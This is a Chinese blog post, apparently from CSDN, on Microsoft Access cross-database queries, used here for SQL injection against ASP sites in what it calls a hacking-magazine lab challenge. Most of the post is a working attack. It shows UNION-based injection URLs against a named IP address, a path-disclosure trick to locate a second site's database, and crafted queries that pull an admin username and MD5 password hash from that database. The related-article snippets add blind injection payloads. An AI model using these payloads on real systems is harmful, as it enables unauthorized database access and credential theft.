Access的跨库查询

最新推荐文章于 2022-02-22 12:11:06 发布
最新推荐文章于 2022-02-22 12:11:06 发布
阅读量3k 收藏
点赞数
分类专栏: 数据库专题 文章标签: access 数据库 microsoft database asp mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luoboqingcai/article/details/242164
版权

        大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询。下面我就给大家介绍下access的跨库查询。

  首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空数据库,对数据库D:/daos/db/daidalos.mdb里的admin表的内容进行查询,SQL语句为:

SELECT * from admin in "D:/daos/db/daidalos.mdb"



点击查看原尺寸图片

  查询后,成功返回目标数据库里表admin表里的内容:



点击查看原尺寸图片

  在实际的asp注射中,要同时进行2个select,如果大家熟悉php+mysql注射的话,应该很容易想到使用union进行联合查询,在access里我们照样可以使用,使用union查询还有一个好处就是不要去对数据进行一个一个字符的去猜,而可以象mysql+php注射一样直接暴出字段里的数据(具体的mix已经写了一篇详细的文章)。从上面可以看出来要实现跨库查询必修要下面2个条件:

  1. 使用union查询必须知道前一个select里表的字段数
  2. 必须知道目标数据库的所在位置,绝对路径。

  条件1我们可以根据提示错误信息来手工猜解,也可以通过程序自动实现。

  条件2 这个是个难点,不过我们可以通过利用“access暴库”来实现,有人会说既然可以知道数据位置,那不直接下载得拉,其实不然,现在的数据库一般防止下载,有的根本不web目录下。

  在黑防第四轮实验室的第一关,就是设置的2个asp+access的下载系统,一个是雨点下载系统,一个是盗帅下载系统。 经过测试 盗帅下载系统可以暴出数据库但是不让下载,似乎也没什么地方可以注射,而雨点下载系统就是漏洞百出了,数据库可以暴且可以直接下载,还可以注射。不过雨点的后台很简单,没什么可以利用的地方,我们的目标就放在得到盗帅后台密码上了,下面我就给大家演示下,通过雨点系统的注射点对盗帅系统的跨库查询而得到盗帅的后台密码:

  我们得知雨点系统的list.asp可以注射,我们先去要得到union里的数据表字段数,提交:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo

  返回:

Microsoft JET Database Engine 错误 '80040e14'

在联合查询中所选定的两个数据表或查询中的列数不匹配。

/yddown/list.asp,行51

  字段不对,我写了个perl脚本自动猜,(代码见后)

  当我们提交:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo

  无错误返回:



点击查看原尺寸图片

  哈哈! 我们已经得到字段数了,并且我们可以得到在字段1的我位置,可以显示我们查询的数据。

   现在还就差盗帅的数据库位置了,简单我们暴库,提交:

http://219.237.81.46/dsdown%5cregs.asp

  成功返回路径:

Microsoft JET Database Engine 错误 '80004005'

'D:/111/db/kljdsld.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

/dsdown/db/user.asp,行6

  (注意:这样得到的的路径不一定是“完整”的,真正的路径为:D:/111/dsdown/db/kljdsld.asa)

  下面我们跨库,构造url如下:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:/111/dsdown/db/kljdsld.asa"%20where%20id=1

  上面的语句是,union查询数据D:/111/db/kljdsld.asa里表admin里id=1的字段admin的数据,如果成功将直接暴出后台管理的用户名:



点击查看原尺寸图片

  得到用户名为admin 我们接着暴密码:

http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:/111/dsdown/db/kljdsld.asa"%20where%20id=1

  如图:

  得到密码为32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我们跨库查询成功,这里我只是为大家演示下跨库查询,黑防那里就不管咯 : )。

小结

  本文主要是给大家介绍了2个非常有用的方法,第1 我们在asp注射时不一顶要一个个字符去猜,那样遇到中文的很麻烦,直接用union替代数据可以直接暴出数据,不关是中文还是特殊字符,都可以一步到位,第2 就是跨库了,使用很灵活,可以让你在渗透时,有意想不到的收获。

luoboqingcai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
access跨库访问追加数据
08-22
access跨库访问及跨库追加数据及联合查询时去除重复数据,在查询中通过设计视图可看代码,用的是相对路径,可更改为绝对路径,需要的参考下。
php结合ACCESS跨库查询功能
10-24
有时候我们在开发一些小程序或简单功能的管理系统,又没有mysql数据库的情况下,就可以使用access了,另外有时需要在两个或三个数据库的表中也可通过ACCESS跨库查询功能实现
跨平台Java程序
01-08
使用Java语言编写应用程序最大的优点在于“一次编译,处处运行”,然而这并不是说所有的Java程序都具有跨平台的特性,事实上,相当一部分的Java程序是不能在别的操作系统上正确运行的,那么如何才能编写一个真正的跨平台的Java程序呢?下面是在编写跨平台的Java程序是需要注意的一些事情:   1.编写Java跨平台应用程序时,你可以选择JDK1.0,1.1,1.2或支持它们的GUI开发工具如:Jbuilder,Visual Age for Java 等等,但是必须注意你的Java程序只能使用Java核心API包,如果要使用第三方的类库包,则该类库包也要由Java核心包开发完成,否则在发布你的程
access数据库查询示例
02-08
access数据库查询示例 两个示例sql查询语句
数据库引擎、数据库查询
qyok的专栏
10-10 843
OPENROWSET包含访问 OLE DB 数据源中的远程数据所需的全部连接信息。当访问链接服务器中的表时,这种方法是一种替代方法,并且是一种使用 OLE DB 连接并访问远程数据的一次性的、特殊的方法。可以在查询的 FROM 子句中像引用表名那样引用 OPENROWSET 函数。依据 OLE DB 提供程序的能力,还可以将 OPENROWSET 函数引用为 INSERT、UPDATE 或 D
access数据库查询
星雨小驿
07-23 1745
     有的时候,我们做项目时,需要在不同的数据库中进行交互,如果在程序中写多个数据库连接多有不便。突然想到同事小李说如果在sql中能查询不同数据库的内容就好了,于是上网查了一下,果然可以实现,不敢独享,整理结果如下:当前数据库为testA,要查询数据库testB中的某个表内容,我们就可以采用如下方法。  第一种:select * from 表名 in testB的路径;  例如:sel
Access数据库查询
Allen Roson
08-04 4363
当前数据库为testA,要查询数据库testB中的某个表内容,我们就可以采用如下方法。   第一种:select * from 表名in 'testB的路径';   例如:select * from qybm in 'd:\accessdb\testB.mdb';       第二种:select * from [;database=testB的路径;pwd=密码].
access/sql跨库查询
linzai专栏
01-09 1308
 昨天偶然的一个机会接触到了跨库查询,就琢磨测试了一番,最后总结如下:所谓的跨库查询,也就是说在两个或则两个以上的数据库间进行数据查询!(是数据库而不是表哦)目前web开发用的较多的数据库莫过于access,sqlserver。sqlserver占多数。先来讲讲access跨库查询:假设有两个access数据库分别为A.mdb和B.mdb,A.mdb有”学校“表单,B.
access跨库注入
weiliang369的博客
02-22 463
跨库注入之逐字猜解法 跨库注入适用环境↓ 在B站点注入A站点。 前提,B和A在同服。 跨库目标位置 C:\Program Files\r3sec\#Data.mdb 判断存在的表↓ And 1=(Select Count(*) from [数据库路径].[表]) 实际判断表的语句↓ And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin]) 判断字段 And 1=(Select Coun.
ACCESS:跨数据库查询的SQL语句
Ben's Bloggings
10-10 5659
By Ben问题说明:有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不了的,可通过ACCESS跨库查询功能实现。解决方法:例如“装材类型”和“装材”两张表是在不同的数据库中的,具体查询方法,如下:@"Select * from 装材类型 as a INNER JOI
Access数据库跨库查询及记录集区分
04-02 323
医疗设备软件一般都是单机软件,如果是Windows平台,常会选择Access数据库存储结构化数据,因为他轻量,便于部署。然而随着医疗信息化的发展,医生希望对多台单机设备的数据进行管理,采用网络数据库当然可以解决这个问题,但软件部署会变得比较麻烦,所以如果Access数据能支持跨库查询,那就完美了,可喜的是Access从2007版就已经支持该功能了,且查询速度还非常快。 Acce...
ACCESS-如何多数据库查询(跨库查询)
weixin_33971130的博客
07-12 935
测试通过:ACCESSselect * from F:\MYk.mdb.tablename说明:1.查询语句2.来原于哪(没有密码是个路径)3.查询的表名=======================================我有两个数据库 A、B 然后我要将两个数据库的两张表组合作为一张表C显示 判断条件是 A数据库的aa表中字段a和B数据库的bb表中字段b相等 并且A数据库的aa表中字段...
最佳实践 | 教你用一条SQL搞定跨数据库查询难题
weixin_34397291的博客
10-31 1189
导读 日前,某电商用户由于业务发展迅猛,访问量极速增长,导致数据库容量及性能遭遇瓶颈。为降低数据库大小,提升性能,用户决定对架构进行垂直拆分。根据不同的表来进行拆分,对应用程序的影响也更小,拆分规则也会比较简单清晰。 该用户按照会员、商品、订单,将数据垂直拆分至三个数据库,分库后数据分布到不同的数据库实例,以达到降低数据量,增加实例数的扩容目的。然而前途...
sqlserver 跨库访问
最新发布
06-13
在 SQL Server 中,跨库访问可以通过以下几种方式实现: 1. 使用全名引用:使用 [database_name].[schema_name].[object_name] 的方式来访问另一个数据库中的对象。 2. 使用三部分名称引用:使用 [server_name].[database_name].[schema_name].[object_name] 的方式来访问另一个服务器上的数据库中的对象。 3. 使用链接服务器:在 SQL Server 中可以创建链接服务器,通过链接服务器可以访问其他服务器上的数据库。 4. 使用 OPENROWSET 和 OPENDATASOURCE 函数:这两个函数可以访问其他数据源,如 Excel、Access 等,同时也可以访问其他服务器上的数据库。 需要注意的是,在跨库访问时,需要确保当前用户具有访问另一个数据库中对象的权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值